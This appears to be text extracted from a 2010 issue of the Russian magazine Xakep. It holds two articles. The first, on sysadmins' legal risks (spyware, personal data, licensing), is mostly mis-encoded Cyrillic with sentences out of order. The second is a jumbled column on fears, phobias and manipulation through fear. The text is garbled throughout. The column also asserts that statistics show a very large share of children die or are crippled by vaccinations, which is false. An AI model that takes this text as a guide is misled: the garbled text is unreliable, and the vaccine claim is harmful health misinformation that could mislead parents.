ñîçäàíèÿ ñîáñòâåííûõ ïðîãðàìì. íå ïðèíèìàþùèõ âñåðüåç òåðìèí «ïðàâà ÷åëîâåêà». Íî åñòü îòâåòñòâåííîñòü çà íàðóøåíèå óñòàíîâëåííûõ ïðàâèë îáðàáîòêè ïåðñîíàëüíûõ äàííûõ (ñò. 42 ÓÊ). ðàçðóëèòü ñèòóàöèþ âñòàíåò ñóùåñòâåííî äîðîæå. Ñèñàäìèí ìîã óæå è ñàì çàáûòü îá ýòîì. Òðåáóåòñÿ ïèñüìåííîå (è ïðèòîì äîáðîâîëüíîå) ñîãëàñèå àáîíåíòîâ. Ïðèêîë â òîì. ïî÷òà ðåäàêòîðà ðóáðèêè: lozovsky@gameland. Óñòàíîâèòü. íàñêîëüêî òåáå íðàâèòñÿ èëè íå íðàâèòñÿ ïîÿâëåíèå «íå-òåõíè÷åñêîé» èíôîðìàöèè â ðàìêàõ ýòîé ðóáðèêè. Íè óâåäîìëåíèå. óòðàòó. ÷òî îòâåòñòâåííîñòü çà óòå÷êó (ðàçãëàøåíèå. Íî íà ðîäèíå ïðàâ ÷åëîâåêà — â Åâðîïå. 23 Êîíñòèòóöèè). òî åñòü êîíôèäåíöèàëüíîé èíôîðìàöèè.ru. Êîå-÷òî ìîæíî ñäåëàòü íà ýòàïå ïðåäâàðèòåëüíîãî ñëåäñòâèÿ. Îïðàâäàòüñÿ îò òàêîãî îáâèíåíèÿ äîñòàòî÷íî ñëîæíî â ñèëó ïîëíîãî îòñóòñòâèÿ ñïåöèàëüíûõ çíàíèé ó ìèëèöèè è ñóäåé. ïîêà «áîëåçíü» åùå íå çàïóùåíà. Íàïðèìåð. íî ðîññèéñêàÿ òåõíèêà åùå íå íàñòîëüêî èíòåðíåòîçàâèñèìà. ñ íèìè ðàáîòàþùèõ. óæå ïîçäíî. Ñòîèò ëè íàïîìèíàòü. åñëè ïðèêàç çàâåäîìî íåçàêîííûé (÷. Ñàìàÿ ýôôåêòèâíàÿ çàùèòà îò íåñïðàâåäëèâîãî (à òàêæå è ÷àñòè÷íî ñïðàâåäëèâîãî) îáâèíåíèÿ â íàðóøåíèè àâòîðñêèõ ïðàâ íà ÏÎ ìîæåò áûòü îêàçàíà äî òîãî. ÷òî óòå÷êà ìîæåò ïðîèçîéòè íåñìîòðÿ íà ñîáëþäåíèå âñåõ ïîëîæåííûõ ïðàâèë. ïîñëå ÷åãî ïåðëþñòðàöèÿ ñòàíîâèòñÿ çàêîííîé. ìîæíî. ïðè÷èíÿþùàÿ âðåä. Ê òîìó âðåìåíè. êîãäà ïîä ñòàòüþ çà âðåäîíîñíûå ïðîãðàììû ïîïàëè àâòîðû õîðîøî èçâåñòíîé è ïîïóëÿðíîé ïðîãðàììû «KGB Spy». Ãîëîñóé! Òðåáóé! Ïðåäëàãàé! Êðîìå òîãî. Íà ïðàêòèêå äîñòàòî÷íî ìíîãî ñëó÷àåâ. 2 ñò. êàê íà÷àëüíèê òðåáîâàë îò àäìèíà ïîñòàâèòü ïðîãðàììó-øïèîí êîìó-òî èç ïîä÷èíåííûõ. Ñóùåñòâóåò ðàñïðîñòðàíåííîå çàáëóæäåíèå. È íàîáîðîò. íî ñëåäîâàòåëü è åãî «êàðìàííûé» ýêñïåðò ìîãóò ýòîãî íå çíàòü. 2 ñò. СЛУЖЕБНОЕ ПРОИЗВЕДЕНИЕ Ýòîò ðèñê òàêæå ñâÿçàí ñ àâòîðñêèìè ïðàâàìè. Ïîñëå îêîí÷àíèÿ ñëåäñòâèÿ. à çàîäíî êîñíåìñÿ è íåêîòîðûõ äðóãèõ ïðàâîâûõ âîïðîñîâ ôóíêöèîíèðîâàíèÿ èíôîðìàöèîííûõ ñèñòåì è ëþäåé. Òàêèõ þðèäè÷åñêèõ ìèí çàìåäëåííîãî äåéñòâèÿ òèïè÷íûé ñèñàäìèí îñòàâëÿåò çà ñîáîé êó÷è. åñëè îí óñòàíîâèò íà êîìïüþòåð ðàáîòíèêà òðîÿíñêóþ øïèîíñêóþ ïðîãðàììó — áîëü- Îò ðåäàêöèè: ãîëîñóé èëè ïðîèãðàåøü Î òîì. ïðèíåñòè âðåä ìîæåò âïîëíå çàêîííàÿ ïðîãðàììà). Èëè íå õîòåòü çíàòü. Ïðàâà íà íèõ ïðèíàäëåæàò ïðåäïðèÿòèþ. 13. ñíèôåðû. äàæå åñëè îíà íå êîíôèäåíöèàëüíà. Çàùèùàòüñÿ îò ýòîãî ðèñêà âûãîäíåå âñåãî ïðè íàéìå ðàáîòíèêà. åå ñëåäóåò çàùèùàòü. «Òÿæêèå ïîñëåäñòâèÿ» — ýòî íå÷òî íàïîäîáèå ïîêàçàííîãî â ôèëüìå «Êðåïêèé îðåøåê-4». Íî çàùèòèòü ïîäñóäèìîãî î÷åíü òðóäíî — êàê ïðàâèëî. ñò. ñîäåðæàíèå êîòîðûõ òàê èíòåðåñíî äëÿ òèïè÷íûõ íà÷àëüíèêîâ. «Èíûå» — ýòî êàê ðàç ýëåêòðîííàÿ ïî÷òà. Åñëè íå ïðîïèñàíà.

îñîáåííî åñëè ôàêòè÷åñêóþ äåÿòåëüíîñòü îñóùåñòâëÿë îí. Íå èìåÿ ñîîòâåòñòâóþùåãî îáðàçîâàíèÿ. Íî âñå ÷àùå ïîïàäàþòñÿ ñðåäè íèõ ïåðñîíàæè ñ ïðîêà÷àííûì ñêèëîì «ïðàâî/þðèñïðóäåíöèÿ». è èíîãäà ïåðåäâèãàþò èõ áåç ïðåäóïðåæäåíèÿ. Ïî ýòîé ñòàòüå ÷àùå âñåãî ïðèâëåêàþò ðóêîâîäèòåëÿ ïðåäïðèÿòèÿ. ðàáîòíèêè-ïðàâîçàùèòíèêè íàõîäÿòñÿ ðåäêî. à ïîðîé è ïðåäñòàâèòåëè âíóòðåííèõ ãðóïïèðîâîê. Êðîìå òîãî. Âåäîìñòâà îïðåäåëÿþò ãðàíèöû ëèöåíçèðîâàíèÿ òàê. ðàçîáðàòüñÿ â íèõ òðóäíî. Ïîýòîìó íå íàäî ñòåñíÿòüñÿ ñïðàøèâàòü ñîâåòà è ó÷èòüñÿ. òåõíàðè ÷àñòî èçëèøíå óñåðäñòâóþò. êîãäà àäìèíîâ ïðèâëåêàëè ê îòâåòñòâåííîñòè çà ñëèøêîì ðåâíîñòíóþ èëè ÷åðåñ÷óð óñåðäíóþ çàùèòó ñâîèõ ðåñóðñîâ (è ïîäîáíûõ ñëó÷àåâ áûëî ãîðàçäî áîëüøå äâóõ). êàê èì óäîáíî. À ýòè îðãàíû ñêëîííû ðóêîâîäñòâîâàòüñÿ îôôëàéíîâûìè çàêîíàìè è ïîëíîñòüþ èãíîðèðîâàòü «ñåòåâûå íîðìû» è ïîíÿòèÿ. à êîãäà íåò. Ê òàêîâûì çàíÿòèÿì îòíîñÿòñÿ: óñëóãè ñâÿçè. êîãäà ñëåäóåò èìåòü ëèöåíçèþ. òðåáóþùèõ ëèöåíçèè. Äàëåêî íå âñå ñðåäñòâà çàùèòû ïðèåìëåìû. ÔÑÁ èëè ïîäà÷åé èñêîâîãî çàÿâëåíèÿ â ñóä. Èíîãäà âíåøíèå çëîóìûøëåííèêè. Ïîëó÷àòü èõ äîëãî è ìóòîðíî.Относительная вероятность различных типов саботажа в IT ñëó÷àÿõ áóäåò íåäåéñòâèòåëüíî (ïîäðîáíåå — http://forensics. Âûèãðàòü ó ïðîææåííûõ áþðîêðàòîâ íà èõ ïîëå ïî èõ ïðàâèëàì òåõíàðü íå ìîæåò. çàâëàäåòü êîììåð÷åñêîé òàéíîé. ЛИЦЕНЗИРУЕМАЯ ДЕЯТЕЛЬНОСТЬ Â Ðîññèè ñóùåñòâóåò äîñòàòî÷íî ìíîãî âèäîâ äåÿòåëüíîñòè. ЗАКЛЮЧЕНИЕ Òîëüêî ñ ïåðâîãî âçãëÿäà ñèñàäìèí âçàèìîäåéñòâóåò ñ òåõíèêîé. ÷òî çàêîíû ýòè ìàññîâî íàðóøàþòñÿ. íî òå îòíîøåíèÿ. ïîñóëû è âçÿòêè. Àäìèíèñòðàòîð è äàæå ðàáîòíèê èíòåðíåò-ïðîâàéäåðà — ýòî íå ñëåäîâàòåëü. Îòíîøåíèÿ. Íå ïðîñòî îòíîøåíèÿ. Åñëè íà òàêîì íàðóøåíèè âñå-òàêè ïîéìàþò. È îíè ìîãóò ïîñòàâèòü áîðöóíà íà ìåñòî îðèãèíàëüíûì ñïîñîáîì — íàïðàâëåíèåì çàÿâëåíèÿ â ìèëèöèþ. à òàêæå äåíüãè. Òàêæå íà ïàìÿòè àâòîðà áûëè ñëó÷àè. åãî è ïîäêóïàþò. ñëó÷àè. À óæ åñëè ïîääàëñÿ íà óãðîçû. z 133 . Íàñëóøàâøèñü êâàçèãëóáîêîìûñëåííûõ èçðå÷åíèé â äóõå «÷åëîâåê — ñëàáåéøåå çâåíî çàùèòû». Òî åñòü ó÷èíèòü ðàçäåëåíèå ïîëíîìî÷èé. 171 ÓÊ). Äåëàòü òàê íå ñòîèò. Ïîýòîìó òàéíà ñâÿçè íàðóøàåòñÿ íà ðîññèéñêèõ ïðåäïðèÿòèÿõ ñïëîøü è ðÿäîì. îïðåäåëåíû â çàêîíàõ íå âïîëíå ÷åòêî. êîòîðûå è ëèöåíçèðóþò òîò èëè èíîé âèä äåÿòåëüíîñòè. íåêîòîðûå çëîóìûøëåííèêè è íà÷èíàþò àòàêó ñ ýòîãî çâåíà. Äàæå íå íàäåéòåñü. Áîðÿñü ñî ñïàìîì. Âîò åãî è ïðåññóþò. êîòîðûå çàòðàãèâàþò ïðàâà è ñâîáîäû ëè÷íîñòè. êàæäûì çàáëîêèðîâàííûì ïàêåòîì. ДРУГИЕ À åùå ñèñàäìèí èíîãäà ñòàíîâèòñÿ îáúåêòîì øàíòàæà. êîòîðîå è ðåêîìåíäóåòñÿ ñòàíäàðòàìè ïî èíôîðìàöèîííîé áåçîïàñíîñòè. íàðóøàÿ ïðàâà äðóãèõ ëþäåé — ñàìèõ çàùèùàåìûõ ïîëüçîâàòåëåé èëè âîîáùå ëþäåé íåïðè÷àñòíûõ. Êàê âèäíî. Íà ñàìîì äåëå êàæäîé íàñòðîéêîé. à îòäàâøèé ïðèêàç íà÷àëüíèê ìîæåò è îòâåðòåòüñÿ. äàæå åñëè îí è íå âèíîâàò. À êòî ó íàñ ïî óìîë÷àíèþ èìååò âûñøèé äîïóñê è ìàêñèìàëüíûå òåõíè÷åñêèå ïîëíîìî÷èÿ? Àäìèí. íå ñóäüÿ è íå ïàëà÷. Ïîäðîáíîñòè îòäàíû íà îòêóï âåäîìñòâàì. áîëüøèíñòâî ïîëüçîâàòåëåé — íè÷òîæíûå ÷åðâè è áåñïðàâíûå ðàáû. òî ñèñàäìèí — ïåðâûé êàíäèäàò â îáâèíÿåìûå. êàæäîé áóêâîé â êîíôèã-ôàéëå. à èíîé ðàç áåç ñîîòâåòñòâóþùèõ ñâÿçåé è âîîáùå íåâîçìîæíî. òàê òåì áîëåå áóäåò ñäåëàí îòâåòñòâåííûì çà âñå. íå ñïîñîáåí. Íåóäèâèòåëüíî. êàê ïðàXÀÊÅÐ 10 /141/ 10 âèëî. ðèñêè ñèñàäìèíà ëåæàò â ïðàâîâîé ñôåðå. õîòÿ ÷àñòåíüêî è íîðîâèò âûïîëíÿòü âñå òðè ðîëè îäíîâðåìåííî. Ïîýòîìó ðèñêóåò îñòàòüñÿ âèíîâàòûì. Êîíå÷íî. Äåéñòâåííûé ñïîñîá çàùèòû äëÿ àäìèíà — íå èìåòü íåîãðàíè÷åííîãî äîñòóïà êî âñåé êîíôèäåíöèàëüíîé èíôîðìàöèè. óãðîç èëè ïîäêóïà ñî ñòîðîíû æåëàþùèõ ïðîíèêíóòü â èíôîðìàöèîííóþ ñèñòåìó ïðåäïðèÿòèÿ.ru/ zi-ts. êàæäîé êîìàíäîé â êîíñîëè îí âîçäåéñòâóåò íà îòíîøåíèÿ ìåæäó ëþäüìè. ôèøèíãîì. DoS-àòàêàìè. Ïðàâäà. È ïåðåõîäÿò ãðàíü çàêîíà.html). òåõíè÷åñêàÿ çàùèòà èíôîðìàöèè è íåêîòîðûå èíûå âèäû äåÿòåëüíîñòè. ïîðíîãðàôèåé è ïðî÷èìè îíëàéíîâûìè è îôôëàéíîâûìè ãðåõàìè. íî ñèñàäìèí òîæå ìîæåò ïîïàñòü ïîä ðàçäà÷ó. êîòîðûå çàùèùåíû çàêîíîì. îáñëóæèâàíèå øèôðîâàëüíîé òåõíèêè. Îäíàêî çà ðàáîòó áåç ëèöåíçèè ïðåäóñìîòðåíà óãîëîâíàÿ îòâåòñòâåííîñòü (ñò. Îòâå÷àòü íà òàêèå âûçîâû è îðèåíòèðîâàòüñÿ â ðàñêëàäå ñèë (÷òîá âîâðåìÿ ñòàòü íà ñòîðîíó ïîáåäèòåëÿ) òåõíè÷åñêèé ñïåöèàëèñò.

в итоге возникает состояние неопределенности. волнение. Почему люди часто боятся разных малоизвестных животных или насекомых? Потому что они в корне отличаются от нас. сравнивая ее одежду. огня. с точки зрения психотерапевта. Эмоция страха колеблется от слабого до сильного. хищников. потому что ей кажется. îòðàâëÿþùèå æèçíü. а водители. и в этом ничем не отличался от животных. будто на нее все время оценивающе смотрят люди. животном страхе — его природной причиной является инстинкт самосохранения. с ним работать легче — ведь причины осознаются. постоянно напоминают о себе. что не успеешь вовремя сориентироваться и принять верное решение. в это время происходят характерные физиологические и химические реакции в организме. 134 кары господней. стихийных бедствий. именно поэтому зачастую приступы фобий сопровождаются паническими атаками. приводя к абсурдному поведению. паника. Например. что они думают и как себя ведут. не говоря уже о психологических. и они совершенно разнообразны. постоянна и не имеет осознаваемых причин. веселье. XÀÊÅÐ 10 /141/ 10 . которое в большинстве случаев порождает страх. как реагировать на то. Теперь боязнь огня отходит на второй план. внешность и аксессуары с окружающими. выглядят иначе (незнакомо). Например. хоть и осознаваемый страх. Шьямалан и другие создатели хоррора в кинематографе остались бы без работы. намного ужаснее кажется факт увольнения. ôîáèè è èõ âàðèàöèè: ýìîöèè. что тебя ждет. Но они всегда есть. в данном случае является фобией. Но в современном языке фобия — это далеко не просто страх. и. боязнь. руководят действиями. причем необязательно объективно — при опасении или предвкушении угрозы тоже возникает это леденящее душу ощущение. нет ощущения своей ценности — ты боишься мнения и оценки окружающих. сильная тревожность. только. то есть иррациональна. которые по неопытности можно назвать фобиями: необоснованный страх. лишенный оснований. этого не понимает сам боящийся. когда с каждым годом увеличивается количество новых фобий в словарях и количество новых пациентов у психологов и психиатров. скука. èëè ïðèÿòíàÿ äîçà àäðåíàëèíà? Если бы не это «замечательное» чувство. Такая же. фобии же оказывают давление на жизнь человека. Но это всего лишь страхи. и как у любого явления. как радость. Невротический. что про него не так подумают или плохо оценят… Именно с такими проблемами люди приходят к психологам. фобия устойчива. как правило. боишься. расти духовно и эмоционально. Хичкок. и в зависимости от этой характеристики она меняет название: тревожность (неосознаваемый страх). которая боится ездить в общественном транспорте (разновидность социофобии).UNITS Оксана «Oriyana» Андреева oriyana@xpsycho. Причин. почему человек боится взгляда куклы? В первую очередь. вызывающих невротический страх. чья деятельность связана с риском — без жизни. или он стал свидетелем ситуации. когда кого-то переехал автомобиль в этой зоне. страх непонятно чего. Ñòðàõ Страх — это эмоция. для него характерны специальные условия возникновения: в ситуациях. более интенсивная и хорошо ощущаемая. спонтанно возникающий страх. женщина. и так же. и особенно — в нашем веке. что его когда-то на «зебре» сбила (или чуть не сбила) машина. опасение. великое множество. не можем прикинуть. не знаешь. если человек боится переходить дорогу по пешеходному переходу. ужас. есть неуверенность в своем профессионализме — ты ужасаешься от вида начальника и каждый день с замиранием сердца и холодом в солнечном сплетении ждешь новости об увольнении. страх не возникает на пустом месте. Боясь показаться хуже по какому-либо из параметров. Страх имеет рациональные корни. как при других эмоциях. мы о них ничего не знаем. она практически всю зарплату тратит на такси. в церковь. у развития есть свои негативные стороны — вместе с продвинутостью у человека появился страх невротический. когда человеку (или животному) что-то угрожает. А вот с фобиями сложнее: как объяснить. есть страхи. как и для других эмоций.ru PSYCHO: ÁÎß Ò ÜÑ ß Í Å Ë Ü Çß È Ã ÍÎÐÈ Ð ÎÂÀÒ Ü Ñòðàõè. что произойдет. Но человеку свойственно развиваться. Резко и неожиданно залаяла собака — впоследствии ты всю жизнь можешь их избегать. Ôîáèè Фобия (phobos) в переводе с греческого означает страх или боязнь. Ïðèðîäà ñòðàõîâ Если говорить о естественном. — в отличие от обычного страха. В целом. Всего лишь миллион лет назад страхи у людей были только инстинктивными — когда человек боялся грома. Еще одной причиной страхов является неизвестность: ты не знаешь. то ты предположишь. высотники и другие. И так же. колдунам. испуг. Страх присущ практически любому мыслящему существу нашей планеты.

что перед оленем охотник со XÀÊÅÐ 10 /141/ 10 страшным ружьем. находясь в состоянии страха. Но не все так просто на самом деле. Варианты агорафобии: страх путешествовать без сопровождающих. а либо смиряешься. как будет действовать. астма. и все умственные усилия направлены на это. потеря сознания. что страх — это субъективная эмоция. Ты прекрасно знаешь. Сюда же относят страх вида крови — гематофобию. если сотрудники Управления «К» заглянут к нему в гости. толпа и замкнутое пространство. • гипсофобия — страх высоты. если вдруг станет плохо. Таким людям можно только посочувствовать. с другой — никто из этих людей не знаком. инфарктофобия. наиболее точной является классификация фобий по фабуле страха. Особенно часто обострения нозофобий наступают во время различных эпидемий. так как сколько болезней. Причем часто человек боится не абстрактной смерти. О них мы поговорим чуть позже. либо готовишься. Группа фобий. страх находиться среди толпы незнакомых людей (хотя. что тебя впереди ждет что-то плохое. панические атаки. слева и справа — бушует огонь или слышен сильный необычный шум. канцерофобия (боязнь заболеть раком). — что и следовало доказать. это касается не только людей) давно пользуются многие манипуляторы. • батофобия — страх глубины. а конкретной: умереть от определенной болезни. Даже если ты точно знаешь. И если страхи носят. К такой фобии склонны люди с высокой мнительностью. медицинский психолог Карвасарский. слишком много думающие. эта фобия имеет невротические корни в виде закрытых пространств при авариях или наказаниях в темных кладовках. кардиофобия (страх сердечных заболеваний). ïîðîæäàåìûå ñîöèóìîì С одной стороны. Такой особенностью психики живого существа (да-да. а сейчас я приведу для иллюстрации простой пример срабатывания инстинкта самосохранения. часто неповторимый характер. что не в огонь и не на шум — из двух зол олень выберет меньшее. Нет неопределенности — нет страха. избавиться от чувства страха. Ñòðàõè. не способен трезво оценивать обстоятельства. Группа фобофобии. где есть шанс остаться без помощи. тревожные. как правило. связанная с пространством. которую предложил известный психиатр. Группа танатофобии. ибо это нонсенс и абсурд. так как они спровоцированы какими-то реальными событиями. К ней относятся: • клаустрофобия — боязнь замкнутого пространства. похожие страхи. Окраску ей мы придаем сами Может. Перечислять подвиды нозофобий можно бесконечно. используется подмена выбора: вместо «бежать или не бежать к охот- ÂÈÄÛ ÑÒÐÀÕÎÂ È ÔÎÁÈÉ Страхов и фобий очень много. ты уже не боишься. либо ищешь варианты изменить ситуацию. Как видишь. поэтому невротиком воспринимается как эмоциональная пустота вокруг). слабо анализирует происходящее вокруг. и каждый индивид сам себе придумывает. Наиболее часто встречаются: сифилофобия. или страх испугаться чего-либо. Группа нозофобий. 135 . что животное вряд ли в здравом уме побежит навстречу охотнику. то фобии обычно достаточно стандартны. в этом случае агорафобия парадоксально переплетается к клаустрофобией: с одной стороны. или страх смерти. куда он побежит? Понятно. Человек. Как правило. он просто подготовился на случай такого «посещения» и знает точно. упасть на рельсы перед поездом метро. которые человек помнит и осознает. индивидуальный. смерть от терракта. или страх чем-то заболеть. • агорафобия — боязнь открытого пространства. можно утверждать. а чего — нет. На мой взгляд.По своей сути страх – всего лишь эмоция. инсультофобия. но не боишься. ты с ужасом ждешь визита отдела по борьбе с киберпреступностью? А кто-то не боится. а сзади. столько и фобий. Но мы изменим условия и предположим. бациллофобия (страх патогенных микроорганизмов). у него одна задача — избежать опасности. Эта фобия особенно свойственна людям с приступами чего-либо: сердечные. зацикливающиеся. чего бояться.

что он четко описывает схему. причиной такому поведению правителей является тот же самый страх: страх утратить бразды правления. все-таки играются с разными ножичками. а труп друга. который давно открыл понятие танатоса — влечения к смерти. немного адаптировав стратегию под наш век. Другими словами. в общем. посещающая церковь. и. В психоанализе есть такое понятие — «комплекс кастрации»: мужчины. русалок. благочестивая во всех смыслах этого слова. Ïðàâèòåëüñòâî Не будем трогать наше действующее правительство. жестокое наказание за непродуманный поступок развивает патогенное прогностиче- 136 Гленофобия – одна из самых загадочных фобий: страх взгляда куклы «Вот был бы Сталин — он бы навел порядок…» А вот что пишут про Сталина исследователи: «В безграничной возможности подменять добро злом и наоборот проявлялась непостижимая загадочность Сталина. Ужасающие истории удовлетворяют этот инстинкт. и наступают они именно среди людей или в общественных местах. Самый распространенный вариант — это коитофобия (страх перед половым актом). Группа сексуальных страхов. конечно же. Группа «контрастных» фобий. который любил Сталина. что один астролог умер от разрыва мочевого пузыря из-за того. приписав это убийство своим идейным противникам. Ну кому это нужно? Намного эффективнее и полезнее держать всех в ежовых рукавицах: никаких попускательств — это помогает дисциплинироваться. Когда человек. И потому лучшим выражением сталинского юмора был труп. природный. что постеснялся выйти в туалет. а именно — в мистике. вызывающих унижение. его страх настоящий. а затем. что человек гипотетически может. ÑÂßÇÀÍÍÛÅ Ñ ËÞÄÜÌÈ È ÎÁÙÅÑÒÂÎÌ Группа социофобий. страх в разумном количестве несет в себе конструктив: он предупреждает о потенциальной опасности. покойников. некоторые считали (и до сих пор считают) его политику справедливой и конструктивной. В фольклорной кладовой любого народа есть страшилки про привидений. Неудачность — в этом примере у оленя выбора нет. страх покраснеть (эрейтофобия). рискуя жизнью в реальности. Именно эту историю не проверяла. прежде чем что-то сказать или сделать. Но не просто труп и не труп врага. Удачность этого примера в том. боясь быть кастрированными. И здесь важно не перепутать природное стеснение с фобией. ведь мы его любим и уважаем. или страх водителя школьного автобуса врезаться в какой-нибудь столб или бензовоз. который считается одним из самых ярких диктаторов и тиранов на европейском пространстве. глава державы живет в спокойствии и гармонии. заставляют жить в напряжении. Ведь зачем прыгать с парашютом. опасными колющережущими предметами. Природные инстинкты — страх. которое может гипотетически вызвать смех — выйти в туалет. лучше обратим взоры на дедушку Сталина. и которому все же Сталин почему-то доверял… Это проявлялось и в большой политике. Что интересно — многие люди действительно любили Сталина. страх потерять партнера. чтобы народ не создавал тебе проблем — достаточно хорошо запугивать его. не задумываясь. нужно быть хоть немного гением. Кто-то считает. своих силах. а женщины. Как видишь. снять верхнюю одежду. особенно противоположного пола. человек ищет ответы во внешних обстоятельствах. развязал цепь показательных Î ÏÎËÜÇÅ ÑÒÐÀÕÀ Как и любая естественная эмоция. Всю страну он держал в страхе и ужасе. Кстати. надо вспомнить дедушку Фрейда. старички то и дело вздыхают: судебных процессов. ское мышление — человек сто раз подумает. идти на уступки… Причем. Да-да. он повинуется инстинкту самосохранения. как ни прогибайся — все равно не угодишь. В основе этой группы фобий лежит глубокая неуверенность в себе. вышибают все комплексы. связанных с общественной жизнью. боясь быть изнасилованными. кто-то — что не в состоянии объяснить невротизмы внутри сознания. Например. сильная зависимость от мнения окружающих. что при помощи таких рассказов у человека происходит катарсис — освобождение от своих собственных страхов и напряжений. если можно запланировано испугаться и получить ту же дозу бодрящего гормона? Адреналин = встряска = активизация внутренних ресурсов организма и психики. с каким упоением ты выискиваешь хорроры и триллеры в предвкушении порции адреналина. профилактические расправы не допустят в умах граждан даже мысли о том. Вполне благородные цели: народ духовно воспитывается. не причиняя вреда самому организму. Существует история о том. но знаю. но не хочет совершать. особенно если оно на грани смерти. Отличный пример — гибель и пропажа без вести журналистов и остальных неугодных. к ним относится страх публичных выступлений. вынужденная любовь к правителю — это сродни продвинутой заповеди «возлюби ближнего своего». или страхов. в большинстве случаев он невротический (надуманный). низкая самооценка. Это был гениальный ход сталинской тактики и политики».UNITS ÔÎÁÈÈ. подверженный фобии. как и у других слишком много думающих хомо сапиенсов. А ты — homо sapiens. помогая быстрее мобилизовать силы и вовремя среагировать на нее. чтобы сойти с пути праведного. чтобы войти в историю. страх за семью. смущение или страх оказаться в центре внимания. свято хранящая верность мужу. человек мыслящий. страх познакомиться с человеком. это навязчивый страх совершить то. боится не удержаться перед какой-нибудь сексуальной оргией. как одного из невротических инстинктов человека. естественные потребности — при достижении слишком высокого уровня напряжения. плевать хотел на неудовлетворенные природные инстинкты: невротическое напряжение для него более значимо. есть в присутствии посторонних. А вот человек. страх потерять лицо… XÀÊÅÐ 10 /141/ 10 . чтобы заманить тебя в ловушку. когда выскочки постоянно норовят свергнуть действующего правителя с трона. именно в адреналине дело. живущий на одних крайностях. страх совершить какое-нибудь действие. Посмотрим. нику» дается выбор «бежать к охотнику или бежать в огонь». женщина. прячутся в темных углах. боится выпасть в противоположные: например. Сталин убил Кирова. Для того. но для того. как это делают некоторые категории власть имущих и манипуляторов. Для них присущ страх ситуаций. пример можно брать с вышеописанного вождя. даже если там людей мало. что такие люди действительно есть. что приведет к гибели детей. чем природное. нужно всего лишь придумать и внушить тебе какой-нибудь страх. ведьм и другую нечисть. Еще страх бывает желанным: вспомни. голод. дает встряску организму. по которой мы попадаемся в ловушку. именно поэтому твой страх редко бывает инстинктивным. и с точки зрения собственной выгоды делал абсолютно правильно: кому нужна демократия.

137 . Потомственная гадалка в третьем поколении: снимаю порчу. она выдумана. Печальная статистика говорит о том. «Зло». Но есть эмоции и поведенческие реакции. мы спасаемся от несуществующей опасности. изжоги. когда речь заходит. создается и внедряется в умы людей. о вакцинации. Дело приобретает более серьезный оборот. Вот несколько примеров. созданного себе человеком. Но это относительно безобидные мелочи. средства гигиены. мордоворот. насколько действующим является спасительный эффект рекламируемого продукта. Похожие «фишки» используются и в политике или бизнесе. Увидев в рекламном блоке ужасающие последствия кариеса.Joshua Hoffine – фотохудожник. как и объект презрения. Стеснение — это предупреждающий страх проявить себя настоящего + страх негативной оценки окружающих в ответ на это проявление. создающий хоррор Кажется. гонимые ужасом. Агрессия (как вариант) — это страх + защитный механизм отрицания — «Я не боюсь! И сейчас я докажу это. А вот большинству потребителей не все равно. Вспоминаем оленя и подмену выбора: вместо «жевать или не жевать жвачку после еды» потребителю приходится выбирать между «жевать «Орбит» или «Дирол». тратя на это абсолютно реальные средства. и они. разворот. Но это говорит сухая статистика. как безжалостна и манипулятивна бывает реклама в погоне за прибылью. зубные пасты и щетки. Испуганные и впечатленные родители понесут младенца в частную поликлинику. Именно поэтому я называю наши страхи преимущественно невротическими — прямой угрозы нет. и возможно уже через пару дней поймут. я начинаю понимать. что боишься. лекарства. Стыд — страх потери идеального образа. бегут и покупают жвачки. что речь идет об абортах. кстати. Презрение — содержит в себе долю страха стать таким же. не проверяя. почему с детства не люблю клоунов :) PR è ðåêëàìà У этих манипуляторов нам учиться и учиться. когда кандидат подается в виде спасителя от какого-либо зла или угрозы. выталкивающих страх из зоны сознания. чтобы «спасти ему жизнь». а бигборды показывают нам печальные глаза ребенка с субтитрами снизу или сверху от картинки: «Мама. который существует в чистом виде — когда ты боишься и понимаешь. от ворот поворот подари мне жизнь…» Если бы не вчиталась. например. или что-то еще». XÀÊÅÐ 10 /141/ 10 кровожадной ветрянке». что тебе безразлично собственное здоровье. колоний бактерий под ободком унитаза и тому подобное… ты еще не побежал за предлагаемым продуктом? Если нет — это значит. что от прививок умирает или становится калеками очень большой процент детей. приворот. Но нет — таким образом производитель вакцинации и его рекламная компания предлагает родителям выбор: «Подарить ребенку безоблачное и здоровое будущее или отдать на съедение ÏÐÎÅÊÖÈÈ ÑÒÐÀÕÀ Â ÏÎÂÑÅÄÍÅÂÍÎÉ ÆÈÇÍÈ Есть страх. И плевать. предварительно придумывается. что выбор полностью противоречит реальной статистике. то подумала бы. первым проявив инициативу». которые являются результатом действия защитных механизмов психики.

что мне нужно…». Как видишь. вернет ему жизнь… А вспомни свои ощущения при ожидании ГИБДД’шника. îõðàííûå ñëóæáû. — даже этого иногда достаточно. Ооой… Порча у тебя. охранные службы и даже инспектора в налоговой. Ìàãè. сделай своему страху назло — подойди и познакомься. где принимают «потомственные в третьем поколении». если человек пошел к такому колдуну. чего не знают все остальные. давай посмотрим (какой-нибудь фокус с помощью колдовского инвентаря). и ездить спокойно?» И я доплатила. создали специальную Профессиональную Ассоциацию магов. Лучше стань и гордо посмотри ему в глаза. и кресты. и ящерицы в бутылочках. Он существует ровно до тех пор. всезнающего. там одну царапину на двери закрасить — не меньше 500 долларов США. При размышлениях о преследующем страхе задай себе вопрос: «Что самое худшее может случиться. чем одно неудавшееся знакомство. Пока причина не осознается. как человек ушел на работу. и карты Таро. Схема работы такого «специалиста». чтобы он исчез. Опять. êîëäóíû Это паук. И это еще не все — тебе за упокой поставлено. Мудрые считают. я останусь без денег. 3. öåëèòåëè. поэтому с их стороны в ход идут страшные сказки: как люди гибнут на ровном месте. а все эмоции субъективны. у тебя есть автомобиль 1. Не только тех. чего ты опасаешься. Что ни говори. Не убегай от своего страха. страх не настоящий. как выглядит. рассказывающего страшилки. Рано бояться того. судя по его виду. знают что-то. то есть надуманны. что лучше спрогнозировать и предотвратить проблему. как меня запугивал страховой агент при покупке обычного полиса гражданской ответственности: «А Вы знаете. они заставляют посетителей поверить в то. медленно. уверенно и самодовольно идущего к твоей машине: так удав приближается к кролику. что они избранные. Если ты боишься подходить на улице к девушкам. и это уже важнее. займусь своим бизнесом. штраф тебе сейчас впаяют чуть ли не до лишения прав. но как только ты поймешь. Конечно же. из твоего кармана). z XÀÊÅÐ 10 /141/ 10 . страховики хорошо умеют обрисовывать ужасающие перспективы существования без страховки. целители и колдуны в третьем поколении — вопрос спорный. Òàáëåòêà îò ñòðàõà Если ты прочитал все. которые должны впарить свои услуги. откуда растут корни страха. если ЭТО произойдет?». 5. стандартна. Например: «Если меня уволят. этот выбор будет правильным :). иногда эти сказки носят абсурдный характер 